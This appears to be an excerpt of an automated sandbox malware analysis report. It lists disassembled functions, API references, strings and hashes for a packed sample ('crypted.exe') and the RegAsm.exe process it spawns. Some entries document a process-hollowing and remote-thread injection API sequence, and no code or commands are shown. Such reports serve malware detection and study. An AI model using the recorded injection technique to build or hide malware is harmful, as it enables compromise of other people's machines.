Associated: 00000007.00000002.2747436808.00000000004BF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.00000000004C8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.00000000004D6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2753481692.00000000004D7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2757586827.000000000067C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2758532389.000000000067E000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1b0000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c5bcc7aeb037907a10fb366263b2ee4b713661fa11e4a162953308517c952428
Instruction ID: 54d1d34c2719785298b202122592965d115a60d8925bbe4032f923f9db7bb13b
Opcode Fuzzy Hash: c5bcc7aeb037907a10fb366263b2ee4b713661fa11e4a162953308517c952428
Instruction Fuzzy Hash: 2F117723F30C295A775C816D8C172BAA5D2DBD825071F533AD826E72C4E994DE23D290

Function 001F8720 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2746566674.00000000001B1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000007.00000002.2746356170.00000000001B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2746566674.0000000000212000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747231865.0000000000219000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.000000000021B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.00000000003AB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.0000000000492000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.00000000004BF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.00000000004C8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.00000000004D6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2753481692.00000000004D7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2757586827.000000000067C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2758532389.000000000067E000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1b0000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: ae7243d17196c7e91785a6def4f6f0ceb0e5b99edb51a1d692ce3f7ae0c9f546
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: 101108BB20018947D604A62DC9F47BBB796EAC5321B3D437AD3414B758DB329945D900

Function 001E645B Relevance: .0, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2746566674.00000000001B1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000007.00000002.2746356170.00000000001B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2746566674.0000000000212000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747231865.0000000000219000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.000000000021B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.00000000003AB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.0000000000492000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.00000000004BF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.00000000004C8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.00000000004D6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2753481692.00000000004D7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2757586827.000000000067C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2758532389.000000000067E000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1b0000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f0e617e8d2b8a67ca7440936bf12224a74a65bab20363b87b04c4b9a094913f2
Instruction ID: bff222709fdab04e0009b6105f35c2543a1db896ce098885bc23881761705f5d
Opcode Fuzzy Hash: f0e617e8d2b8a67ca7440936bf12224a74a65bab20363b87b04c4b9a094913f2
Instruction Fuzzy Hash: D5E08C30142A88ABCE2ABF15C90494D3B5AEF61384F804810F8088A2B1CB65ECC2CA90

Function 001EA1C2 Relevance: .0, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2746566674.00000000001B1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000007.00000002.2746356170.00000000001B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2746566674.0000000000212000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747231865.0000000000219000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.000000000021B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.00000000003AB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.0000000000492000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.00000000004BF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.00000000004C8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.00000000004D6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2753481692.00000000004D7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2757586827.000000000067C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2758532389.000000000067E000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1b0000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
Instruction ID: 7f7cb3b1923f3102c0502658981c03685c3cf06568eb002817c707594c49da5a
Opcode Fuzzy Hash: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
Instruction Fuzzy Hash: 66E04632915668EBCB15DB89894498AF2ACEB48B10F558096B601D3240C370EF00C7D0

Function 001E4770 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 148COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 001E47A7
___except_validate_context_record.LIBVCRUNTIME ref: 001E47AF
_ValidateLocalCookies.LIBCMT ref: 001E4838
__IsNonwritableInCurrentImage.LIBCMT ref: 001E4863
_ValidateLocalCookies.LIBCMT ref: 001E48B8

Strings

csm, xrefs: 001E484D

Memory Dump Source

Source File: 00000007.00000002.2746566674.00000000001B1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000007.00000002.2746356170.00000000001B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2746566674.0000000000212000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747231865.0000000000219000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.000000000021B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.00000000003AB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.0000000000492000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.00000000004BF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.00000000004C8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.00000000004D6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2753481692.00000000004D7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2757586827.000000000067C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2758532389.000000000067E000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1b0000_axplong.jbxd

Yara matches

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: eed6d72f2d52df20eff98aff580552200fbdbd55dc8a6045980e8d64e17da702
Instruction ID: d7ab797a772fb1629677c082296a96ef89f0587706f52e126dc0afff777ca13b
Opcode Fuzzy Hash: eed6d72f2d52df20eff98aff580552200fbdbd55dc8a6045980e8d64e17da702
Instruction Fuzzy Hash: E051E734A00AC89BCF14DFAAD885EAEBBB6EF15318F148195F8059B352D731DE15CB90

Function 001E70C9 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 74COMMON

Download Yara Rule

APIs

_wcsrchr.LIBVCRUNTIME ref: 001E710B

Strings

.exe, xrefs: 001E7118
.cmd, xrefs: 001E7129
.bat, xrefs: 001E713A
.com, xrefs: 001E714B

Memory Dump Source

Source File: 00000007.00000002.2746566674.00000000001B1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000007.00000002.2746356170.00000000001B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2746566674.0000000000212000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747231865.0000000000219000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.000000000021B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.00000000003AB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.0000000000492000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.00000000004BF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.00000000004C8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.00000000004D6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2753481692.00000000004D7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2757586827.000000000067C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2758532389.000000000067E000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1b0000_axplong.jbxd

Yara matches

Similarity

API ID: _wcsrchr
String ID: .bat$.cmd$.com$.exe
API String ID: 1752292252-4019086052
Opcode ID: 244e018895da579f6e7ce6991c3a18c05389dcad9a21159da4b8766f1a4c2205
Instruction ID: 2002c2e981566fad5449da1bae2414bf3693b263f6f549ba5c7b88dd674f416a
Opcode Fuzzy Hash: 244e018895da579f6e7ce6991c3a18c05389dcad9a21159da4b8766f1a4c2205
Instruction Fuzzy Hash: 7401D63765CF96267618651BDC0263F17989B93BB8729002BFA44F73C3EF54EC4241A0

Function 001B2E80 Relevance: 7.8, APIs: 5, Instructions: 272COMMON

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 001B2F1F
__Mtx_unlock.LIBCPMT ref: 001B2F8C
__Cnd_broadcast.LIBCPMT ref: 001B2FA3
__Mtx_unlock.LIBCPMT ref: 001B30B5
__Mtx_unlock.LIBCPMT ref: 001B315B

Memory Dump Source

Source File: 00000007.00000002.2746566674.00000000001B1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000007.00000002.2746356170.00000000001B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2746566674.0000000000212000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747231865.0000000000219000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.000000000021B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.00000000003AB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.0000000000492000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.00000000004BF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.00000000004C8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.00000000004D6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2753481692.00000000004D7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2757586827.000000000067C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2758532389.000000000067E000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1b0000_axplong.jbxd

Yara matches

Similarity

API ID: Mtx_unlock$Cnd_broadcast
String ID:
API String ID: 32384418-0
Opcode ID: ba42d081db4a39094e9ca14994ecc210682473453d72fc7a8904f39658230cf8
Instruction ID: d0bfd22d133a6081fff494ca1009023bfefdf2e81a48df59716d5c379ec70df1
Opcode Fuzzy Hash: ba42d081db4a39094e9ca14994ecc210682473453d72fc7a8904f39658230cf8
Instruction Fuzzy Hash: 57A1C1B0A012159FDB11EF69C945BAAB7F8FF25314F04822DE819D7241EB35EA18CBD1

Function 001EC9B0 Relevance: 6.3, APIs: 4, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 001ECA37

Memory Dump Source

Source File: 00000007.00000002.2746566674.00000000001B1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000007.00000002.2746356170.00000000001B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2746566674.0000000000212000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747231865.0000000000219000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.000000000021B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.00000000003AB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.0000000000492000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.00000000004BF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.00000000004C8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.00000000004D6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2753481692.00000000004D7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2757586827.000000000067C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2758532389.000000000067E000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1b0000_axplong.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 7941c91dc3c81985f55d5af0d0e5d35b4c2fcc41726f6f06d2574da038ee3747
Instruction ID: 23b98211d67c69eff34ebd213d0a5349116032fdf386f9b89b2736d51d906610
Opcode Fuzzy Hash: 7941c91dc3c81985f55d5af0d0e5d35b4c2fcc41726f6f06d2574da038ee3747
Instruction Fuzzy Hash: FCB11632900AC59FDB15CF2ACC51BBEBBE5EF95340F2481AAE8559B241D7349D42CBA0

Function 001CBAA2 Relevance: 6.1, APIs: 4, Instructions: 80COMMON

Download Yara Rule

APIs

_xtime_get.LIBCPMT ref: 001CBAFA
__Xtime_diff_to_millis2.LIBCPMT ref: 001CBB14
_xtime_get.LIBCPMT ref: 001CBB37
__Xtime_diff_to_millis2.LIBCPMT ref: 001CBB43

Memory Dump Source

Source File: 00000007.00000002.2746566674.00000000001B1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000007.00000002.2746356170.00000000001B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2746566674.0000000000212000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747231865.0000000000219000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.000000000021B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.00000000003AB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.0000000000492000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.00000000004BF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.00000000004C8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.00000000004D6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2753481692.00000000004D7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2757586827.000000000067C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2758532389.000000000067E000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1b0000_axplong.jbxd

Yara matches

Similarity

API ID: Xtime_diff_to_millis2_xtime_get
String ID:
API String ID: 531285432-0
Opcode ID: 86b9c591c39766c3d8d0a07448ea420980dac35048a5a90cff747101d5dc5425
Instruction ID: 18c2d586e036893058fe1fd2a15ce9de17488bd4d0f0858dd194a280110185f2
Opcode Fuzzy Hash: 86b9c591c39766c3d8d0a07448ea420980dac35048a5a90cff747101d5dc5425
Instruction Fuzzy Hash: BD214F71A002199FDF10EFA4DC86EEEBBB8EF29710F004069F905A7251DB30ED018BA1

Function 001EF21F Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 113COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 001EF263

Strings

`'!, xrefs: 001EF235
8"!, xrefs: 001EF30B

Memory Dump Source

Source File: 00000007.00000002.2746566674.00000000001B1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000007.00000002.2746356170.00000000001B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2746566674.0000000000212000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747231865.0000000000219000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.000000000021B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.00000000003AB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.0000000000492000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.00000000004BF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.00000000004C8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2747436808.00000000004D6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2753481692.00000000004D7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2757586827.000000000067C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2758532389.000000000067E000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1b0000_axplong.jbxd

Yara matches

Similarity

API ID: ___free_lconv_mon
String ID: 8"!$`'!
API String ID: 3903695350-1091487664
Opcode ID: ce87be3e8482fd2744923c15ec87fd6256b7d6b43b1792ac8df0a8e6197d26dd
Instruction ID: 2264e25844035808d91c20d4fc14743801e6cb63020343a36d43499ff027a800
Opcode Fuzzy Hash: ce87be3e8482fd2744923c15ec87fd6256b7d6b43b1792ac8df0a8e6197d26dd
Instruction Fuzzy Hash: 5E315831600A859FEB21AB7AD905B5EB3E9BF50310F64482DE84BD7291DF31EC82DB11

Analysis Process: crypted.exePID: 4216, Parent PID: 3212COMMON

Execution Graph

Execution Coverage:	29.8%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	20.7%
Total number of Nodes:	29
Total number of Limit Nodes:	0

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 02F72555 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 282
threadinjectionmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 02F726C4
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 02F726D7
Wow64GetThreadContext.KERNEL32(?,00000000), ref: 02F726F5
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 02F72719
VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040), ref: 02F72744
WriteProcessMemory.KERNELBASE(?,00000000,?,?,00000000,?), ref: 02F7279C
WriteProcessMemory.KERNELBASE(?,?,?,?,00000000,?,00000028), ref: 02F727E7
WriteProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 02F72825
Wow64SetThreadContext.KERNEL32(?,?), ref: 02F72861
ResumeThread.KERNELBASE(?), ref: 02F72870

Strings

GetP, xrefs: 02F725D7
aryA, xrefs: 02F7259B
Load, xrefs: 02F72593
ress, xrefs: 02F725DF

Memory Dump Source

Source File: 00000009.00000002.1959821349.0000000002F72000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F72000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2f72000_crypted.jbxd

Similarity

API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
String ID: GetP$Load$aryA$ress
API String ID: 2687962208-977067982
Opcode ID: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
Instruction ID: 571b3b0d3fd7a4b29e99e0aa5095a020c6dc67ee09da65ddf8b30165359d1c74
Opcode Fuzzy Hash: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
Instruction Fuzzy Hash: 80B1E37660028AAFDB60CF68CC80BDA77A5FF88714F158125EA0CAB341D774FA518B94

Function 02DE0B39 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 340
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(03F73594,?,?,?), ref: 02DE0FB9

Strings

#l>@, xrefs: 02DE0DA9
<1i;, xrefs: 02DE0CBC

Memory Dump Source

Source File: 00000009.00000002.1958660372.0000000002DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2de0000_crypted.jbxd

Similarity

API ID: ProtectVirtual
String ID: #l>@$<1i;
API String ID: 544645111-2199172079
Opcode ID: d56316bd3e561e678bc5582c6aa5ca309ec011938a6b2e6acb8fce761387c7e9
Instruction ID: 2ee81d288ae718c4355f6814df69bd03a3ea2b09aa299731cfb73e1e9a393071
Opcode Fuzzy Hash: d56316bd3e561e678bc5582c6aa5ca309ec011938a6b2e6acb8fce761387c7e9
Instruction Fuzzy Hash: FFD169B0D006588BDF21DFA9C880BAEBBF2AF48714F248599E45ABB355C3749D41CF91

Function 02DE0504 Relevance: 1.6, APIs: 1, Instructions: 69
threadinjectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateRemoteThread.KERNELBASE(?,00000000,?,?,00000000,?,?), ref: 02DE109C

Memory Dump Source

Source File: 00000009.00000002.1958660372.0000000002DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2de0000_crypted.jbxd

Similarity

API ID: CreateRemoteThread
String ID:
API String ID: 4286614544-0
Opcode ID: c110dee345f2d6bc8cf1b3a4937922e52d00eba811d8dbcc82e69cd9add92a9a
Instruction ID: 51769c8423b6c70107d46afa4dbce8d35ede4331e163666d7b7ef13dca96a5bc
Opcode Fuzzy Hash: c110dee345f2d6bc8cf1b3a4937922e52d00eba811d8dbcc82e69cd9add92a9a
Instruction Fuzzy Hash: A931D0B5A00249DFCF10DF9AD984ADEBBF5FB48310F20842AE919A7350D375A950CBA5

Function 02DE0FF8 Relevance: 1.6, APIs: 1, Instructions: 68
threadinjectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateRemoteThread.KERNELBASE(?,00000000,?,?,00000000,?,?), ref: 02DE109C

Memory Dump Source

Source File: 00000009.00000002.1958660372.0000000002DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2de0000_crypted.jbxd

Similarity

API ID: CreateRemoteThread
String ID:
API String ID: 4286614544-0
Opcode ID: 2572d452875b8fcb325e4f04e62f9f36c4aee692a840acc56a8842ecb872b0ea
Instruction ID: dd426a5bd53f265f2e9e1455aecba3f636e318c733ce7b675da22c452ff5ace1
Opcode Fuzzy Hash: 2572d452875b8fcb325e4f04e62f9f36c4aee692a840acc56a8842ecb872b0ea
Instruction Fuzzy Hash: 5B31F0B1A00249DFCB10CF9AD984ADEBBF0FB48310F20802AE819A7350C375A950CFA5

Function 02DE04F8 Relevance: 1.6, APIs: 1, Instructions: 55
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(03F73594,?,?,?), ref: 02DE0FB9

Memory Dump Source

Source File: 00000009.00000002.1958660372.0000000002DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2de0000_crypted.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: fe5b596c3df046283e5a1a51503f03b18432adcd356d13ab1b53a0eb68f3f08f
Instruction ID: 96b9a0f86de87b5514a582f1cd716c4deb244d82716d39c87db55849aaa4668e
Opcode Fuzzy Hash: fe5b596c3df046283e5a1a51503f03b18432adcd356d13ab1b53a0eb68f3f08f
Instruction Fuzzy Hash: AB21EFB1901659AFCB10DF9AD884ADEFBB4FB48310F10812AE918B7340C3B4A954CFA5

Analysis Process: RegAsm.exePID: 3964, Parent PID: 4216COMMON

Execution Graph

Execution Coverage:	12.7%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	88
Total number of Limit Nodes:	6

Executed Functions

Function 06E0CA50 Relevance: 2.9, Strings: 2, Instructions: 364
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

1, xrefs: 06E0CD55
., xrefs: 06E0CCD0

Memory Dump Source

Source File: 0000000B.00000002.2122369915.0000000006E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6e00000_RegAsm.jbxd

Similarity

API ID:
String ID: .$1
API String ID: 0-1839485796
Opcode ID: 12cea97fdf422edbe73b9c0ec557b682be4871dd08d9fec5876ddbce8a327d63
Instruction ID: 7cdbee83b8502a2d227dce7d7b97b316746f73358cdd0f284f03c1ab5128fd36
Opcode Fuzzy Hash: 12cea97fdf422edbe73b9c0ec557b682be4871dd08d9fec5876ddbce8a327d63
Instruction Fuzzy Hash: D7F1FF74E01328CFEB68DF65C950BEDBBB2BF89301F1091A9D509AB290DB715A85CF10

Function 06E088B8 Relevance: 2.7, Strings: 2, Instructions: 199
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

##, xrefs: 06E08AB6, 06E08ABB
", xrefs: 06E08997, 06E0899C

Memory Dump Source

Source File: 0000000B.00000002.2122369915.0000000006E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6e00000_RegAsm.jbxd

Similarity

API ID:
String ID: ##$"
API String ID: 0-1155805535
Opcode ID: e7dcd63388a2c13936cfd1caccd547b54de2b766de6ee55db95da7c13480d968
Instruction ID: 61e3d9dbf84088181e2e6556fd6bcfc67c51339d0041e7659d0bd93fca04df68
Opcode Fuzzy Hash: e7dcd63388a2c13936cfd1caccd547b54de2b766de6ee55db95da7c13480d968
Instruction Fuzzy Hash: BF91D074E01318CFDB64DFA9D994B9DBBB2FF49300F1091A9D449AB291DB346A84CF41

Function 06E07E10 Relevance: 1.6, APIs: 1, Instructions: 60libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 06E07E75

Memory Dump Source

Source File: 0000000B.00000002.2122369915.0000000006E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E00000, based on PE: false

Joe Sandbox IDA Plugin

